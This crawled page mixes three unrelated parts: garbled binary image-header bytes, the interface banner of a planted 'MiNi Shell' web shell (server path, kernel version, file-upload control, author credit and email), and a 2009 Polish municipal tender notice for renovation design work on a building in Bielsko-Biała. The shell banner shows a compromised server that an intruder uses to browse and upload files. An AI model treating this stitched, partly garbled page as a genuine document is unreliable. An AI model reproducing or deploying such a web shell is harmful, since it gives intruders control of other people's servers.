JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090323/73498-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: Wykonanie dokumentacji projektowej remontu konserwatorskiego budynku ul. Wzgórze 14 w Bielsku-Białej ( budynek podpiwniczony, pietrowy, kubatura: 4.720m3, pow. ogółem: 541m2)</b><br>
<b>Numer ogłoszenia: 73498 - 2009; data zamieszczenia: 23.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bielsko-Biała - Urząd Miejski w Bielsku-Białej Pełnomocnik Prezydenta Miasta ds. Rewitalizacji Starówki , ul. Cieszyńska 15, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8227012, faks 033 8228399.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej remontu konserwatorskiego budynku ul. Wzgórze 14 w Bielsku-Białej ( budynek podpiwniczony, pietrowy, kubatura: 4.720m3, pow. ogółem: 541m2).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej remontu        konserwatorskiego budynku ul. Wzgórze 14  w Bielsku- Białej ( budynek 
   podpiwniczony, piętrowy , kubatura: 4.720  m 3, pow. ogółem: 541  m2) 
   Kod CPV : 74222100-2

Przedmiot zamówienia obejmuje w szczególności: 

1.Prace przygotowawcze:
      1.1.Uzyskanie  warunków zasilania w niezbędne media
      1.2.Uzyskanie aktualnych podkładów sytuacyjno-wysokościowych
      1.3.Uzyskanie wypisów i wyrysów z rejestru gruntów oraz wypisu i wyrysu z Miejscowego Planu Zagospodarowania Przestrzennego Bielskiej Starówki
2. Opracowanie dokumentacji projektowej obejmującej m.in.:                                                     
  2.1. Inwentaryzację obiektu 
     2.2. Badania konserwatorskie
     2.3. Ekspertyzę konstrukcyjną
     2.4. Ekspertyzę mykologiczną
     2.5. Projekty budowlano-wykonawcze w zakresie:
            a) architektoniczno-budowlanym ( obejmującym w szczególności: roboty budowlano -konstrukcyjne w tym m.in.: izolacje, remont dachu, obróbki blacharskie, odnowienie elewacji,  wymianę stolarki okiennej, przebudowę ścianek wewnętrznych  i roboty wykończeniowe lokali  użytkowych itp. ),
           b) instalacji wod.-kan.,cwu z przyłączami,
           c) instalacji centralnego ogrzewania ( bez projektu węzła cieplnego oraz przyłącza ciepłowniczego  ),
           d) instalacji elektrycznych z przyłączem,
           e) instalacji  teletechnicznych z przyłączem,
           f) instalacji domofonowej,
           g) instalacji p.poż,
           h) instalacji wentylacji i klimatyzacji,
           i) instalacji anteny centralnej,
          
     2.6. Opracowanie BIOZ
     2.7. Opracowanie kosztorysów inwestorskich
     2.8. Opracowanie przedmiarów robót
     2.9. Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych
    2.10. Opracowanie skróconego audytu energetycznego budynku
    2.11. Opracowanie  audytu energetycznego budynku


 Uwaga: Projekty, które tego wymagają  powinny posiadać informację  dotyczącą  
             bezpieczeństwa i ochrony zdrowia ze względu  na specyfikę projektowanych obiektów budowlanych ( Prawo budowlane  jedn. Tekst  Dz. U. Nr 207 z 2003r. poz.  2016 art. 20 ust. 1 pkt 1 b )..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.22.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium na rzecz Urzędu Miejskiego      w Bielsku-Białej, Plac Ratuszowy 1, 43-300 Bielsko-Biała, w wysokości  2000,- zł, (dwa tysiące  złotych), przed  upływem terminu składania ofert.Wykonawca, który nie wniesie wadium w wymaganym terminie zostanie wykluczony z postępowania o udzielenie zamówienia. 

2.Wadium może być wniesione w jednej lub kilku następujących formach:
a)pieniądzu;
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-                   -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy     z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm. ).

3.Wadium wnoszone w pieniądzu należy wpłacić przelewem (wyłącza się możliwość wniesienia wadium w gotówce) na rachunek bankowy Zamawiającego w Banku PEKAO S.A. Oddział          w Bielsku-Białej, ul. Stojałowskiego 23, Nr  25 1240 4142 1111 0000 4822 9638
Uwaga! - przy wnoszeniu wadium przelewem, dokument polecenia dokonania przelewu nie jest dowodem wniesienia wadium; 
Dokumentem potwierdzającym dokonanie wpłaty wadium jest uznanie kwotą wadium rachunku Zamawiającego ( wpływ środków na rachunek Zamawiającego przed upływem terminu składania ofert).

 4. Wadium w innej formie niż pieniądz należy złożyć w  formie oryginału w biurze Pełnomocnika   Prezydenta Miasta ds. Rewitalizacji Starówki w Bielsku- Białej ul. Cieszyńska 15 przed upływem terminu składania ofert. Gwarancja zapłaty wadium winna  być bezwarunkowa i płatna na pierwsze żądanie oraz powinna podlegać prawu polskiemu i być realizowana w Polsce. 
Termin ważności gwarancji nie może być krótszy niż termin związania ofertą, tj. 30 dni. 

5.Potwierdzenie wniesienia wadium należy dołączyć do oferty.

6.   Zwrot wadium:
Zamawiający dokonuje zwrotu wadium z chwilą upływu terminu związania ofertą (art. 85 ust. 1 Prawa zamówień publicznych) oraz w pozostałych przypadkach wymienionych w art.46 ust. 1    i 2 Prawa zamówień publicznych (Pzp).
Zwrot wadium wniesionego w pieniądzu nastąpi zgodnie z art. 46 ust. 4 Pzp.
Zamawiający zatrzymuje wadium wraz z odsetkami (art. 46 ust. 4a i 5), jeżeli wykonawca, którego oferta została wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
            -     nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
            -     zawarcie umowy ws. zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
            -     jeżeli Wykonawca w odpowiedzi na wezwanie,o którym mowa w art. 26 ust.3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn
                   nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:

1. Są uprawnieni do wykonywania określonej działalności lub czynności zgodnie z     wymaganiami  ustawowymi .
    Ocena spełnienia warunku na podstawie dostarczonego dokumentu opisanego  w Części VI    
    punkt II,  ppkt  1 i 7 Specyfikacji istotnych warunków zamówienia (siwz). 
   
   W przypadku wykonawców działających wspólnie ( spółka cywilna, konsorcjum ) dotyczy każde
   go Wykonawcy z osobna. 

2. Posiadają niezbędną wiedzę i doświadczenie.
    Spełnienie warunku -  wykonanie  w ciągu  ostatnich 3 lat przed dniem wszczęcia postępowania               
    o udzielenie zamówienia,  a  jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie:
-co najmniej  1  zamówienia polegającego  na opracowaniu pełnobranżowego          
 projektu remontu konserwatorskiego budynku, o wartości nie mniejszej niż 50.000 zł.  
Ocena spełnienia warunku na podstawie dostarczonych dokumentów opisanych  w Części VI punkt II ppkt. 3, 4 i 7 siwz. 

3. Dysponują potencjałem technicznym niezbędnym do wykonania zamówienia lub             
    przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału           
    technicznego. 
    Ocena spełnienia warunku na podstawie złożonego  oświadczenia  opisanego  w Części VI      
     punkt II   ppkt  7 siwz.

4. Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne                
    zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania                  
    zamówienia.

    Spełnienie warunku: dysponowanie  projektantami posiadającymi uprawnienia do                
    projektowania bez ograniczeń -co najmniej jednym w każdej z niżej wymienionych specjalności:
a) architektonicznej, 
b) konstrukcyjno-budowlanej,
    c) instalacyjnej w zakresie:
    -  instalacji wodociągowych i kanalizacyjnych, 
    - elektrycznej w zakresie instalacji  i urządzeń elektrycznych i elektroenergetycznych,
    - cieplnej w zakresie instalacji  i urządzeń cieplnych,
    będącymi członkami Okręgowej Izby Architektów lub Inżynierów Budownictwa i posiadającymi 
    wymagane ubezpieczenie od odpowiedzialności cywilnej.
    Ocena spełnienia warunku na podstawie:
   - dostarczonych dokumentów  opisanych w Części VI pkt. II ppkt  5.1 i 5.2, 
   - złożonego oświadczenia opisanego w Części VI pkt II ppkt  7,
   - zobowiązania pisemnego  opisanego w Części VI pkt II  ppkt 6.
    
5. Znajdują się w sytuacji ekonomicznej  i finansowej zapewniającej wykonanie zamówienia.
	
    Ocena spełnienia warunku na podstawie złożonego oświadczenia  opisanego w Części VI punkt    
    II, ppkt 7  siwz. 

6. Nie podlegają wykluczeniu z postępowania o udzielenie Zamówienia.
    Spełnienie warunku - nie podleganie wykluczeniu z postępowania na podstawie  Art. 24 ust.1i 2 
    ustawy Prawo zamówień publicznych. W przypadku wykonawców działających wspólnie (spółka 
    cywilna, konsorcjum, itd.) dotyczy każdego Wykonawcy z osobna.

    Ocena spełnienia warunku na podstawie złożonych zaświadczeń opisanych  w Części VI pkt II,  
    ppkt  2 siwz oraz na podstawie złożonego oświadczenia opisanego w Części VI pkt II,  
    ppkt  7 siwz. 

7.  Akceptują warunki zawarte w niniejszej Specyfikacji istotnych warunków zamówienia 
     wraz z załącznikami i przyjmują je bez zastrzeżeń. 
    Ocena spełnienia warunku na podstawie  złożonego oświadczenia opisanego w Części VI pkt I, 
    ppkt  4.

    Ocena spełnienia powyższych warunków będzie polegać na sprawdzeniu kompletności                   
     i poprawności złożonych dokumentów i oświadczeń według zasady spełnia/ nie spełnia.

8.   Wniosą wadium w wysokości ustalonej przez Zamawiającego.
     Spełnienie warunku - uznanie kwotą wadium rachunku Zamawiającego lub złożenie oryginału 
     dokumentu wadialnego w biurze Pełnomocnika Prezydenta Miasta przed upływem terminu          
     składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca winien dostarczyć:
I. Dokumenty składające się na ofertę:

1. Oryginał oferty przetargowej  sporządzonej na formularzu ofertowym stanowiącym  Załącznik Nr 1 do siwz.

2. Wyliczenie ceny przedmiotu zamówienia sporządzone z uwzględnieniem zapisów Części  XII  siwz.

3. Pełnomocnictwo ( oryginał lub kopia poświadczona przez notariusza) do reprezentowania podmiotów występujących wspólnie (spółki cywilne, konsorcja) . Z powyższego dokumentu powinien wynikać zakres udzielonego pełnomocnictwa; pełnomocnik winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie. 

4.  Oświadczenie wykonawcy ( na formularzu oferta przetargowa zał. nr 1 do siwz):
      - o terminie wykonanie przedmiotu zamówienia,
      - o udzielonej gwarancji i rękojmi,
      - o terminie związania ofertą,
      -o zdobyciu informacji koniecznych do sporządzenia oferty  
      -o zapoznaniu się z warunkami przetargu zawartymi w specyfikacji istotnych  warunków          zamówienia wraz z załącznikami i przyjęciu tych warunków bez zastrzeżeń                          oraz
      - zobowiązaniu się do zawarcia umowy na warunkach określonych we wzorze umowy (załącznik nr 3 siwz).
    
II. Oświadczenia i dokumenty potwierdzające spełnienie przez Wykonawcę warunków udziału w postępowaniu:

1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie  do ewidencji  działalności  gospodarczej, potwierdzające posiadane uprawnienia do występowania w obrocie prawnym w zakresie obejmującym przedmiot zamówienia - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..
   W przypadku przedsiębiorców  występujących  wspólnie - m.in. spółki cywilne, konsorcja  - Zaświadczenie o wpisie  do ewidencji działalności gospodarczej lub odpis z właściwego rejestru każdego ze wspólników .  

2. Aktualne zaświadczenie właściwego  naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione  nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert.

   W przypadku Wykonawców występujących wspólnie (spółka cywilna, konsorcjum), zaświadczenia każdy z Wykonawców składa oddzielnie.

3. Wykaz  wykonanych przez  Wykonawcę  w okresie  ostatnich 3 lat przed dniem wszczęcia          
    postępowania o udzielenie zamówienia, a  jeżeli  okres prowadzenia działalności jest krótszy - 
    w tym okresie: co najmniej 1  zamówienia polegającego  na opracowaniu pełnobranżowego          
    projektu remontu konserwatorskiego budynku, o wartości nie mniejszej niż 50.000 zł.  

4.  Dokumenty potwierdzające, że wymienione zgodnie z punktem II ppkt 3 prace zostały wykonane należycie (referencje zamawiających, ewentualnie kopie protokołów odbioru).

5.  Wykaz osób - projektantów w odpowiedniej branży, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć  w wykonywaniu niniejszego zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności;
      A ponadto :
5.1 kserokopie uprawnień projektowych projektantów przewidzianych do wykonania zamówienia.
5.2 aktualne zaświadczenia o wpisie na listę członków Okręgowej Izby Architektów lub Okręgowej Izby Inżynierów Budownictwa i ubezpieczeniu od odpowiedzialności cywilnej autorów projektów.     

6. Pisemne zobowiązanie innych podmiotów  do udostępnienia osób zdolnych  do wykonania zamówienia, jeżeli w Wykazie, o którym mowa w pkt 5, wykonawca wskazał osoby, którymi       będzie dysponował.
  
7. Oświadczenie  w  trybie Art. 22  ust. 1  ustawy  Prawo zamówień publicznych 
     (Dz. U. Nr 223 z 2007 r. poz.1655 z późn. zm.) zwanej dalej  Pzp - załącznik Nr 2 do nin. siwz.  
     W przypadku Wykonawców składających ofertę wspólnie - m.in. spółki cywilne, konsorcja-       oświadczenie każdy z Wykonawców  składa oddzielnie.  

8. Kopia dowodu wniesienia wadium lub oryginał dokumentu wadialnego.

Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy  oraz form, w jakich dokumenty mogą być składane (Dz. U. z 2006r. Nr 87,poz. 605).

Uwaga: dokument składany w formie kserokopii winien być poświadczony za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.bielsko.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski biuro Pełnomocnika Prezydenta Miasta ds. Rewitalizacji Starówki ul. Cieszyńska 15 Bielsko-Biała.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2009 godzina 09:00, miejsce: Urząd Miejski biuro Pełnomocnika Prezydenta Miasta ds. Rewitalizacji Starówki ul. Cieszyńska 15 Bielsko-Biała.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com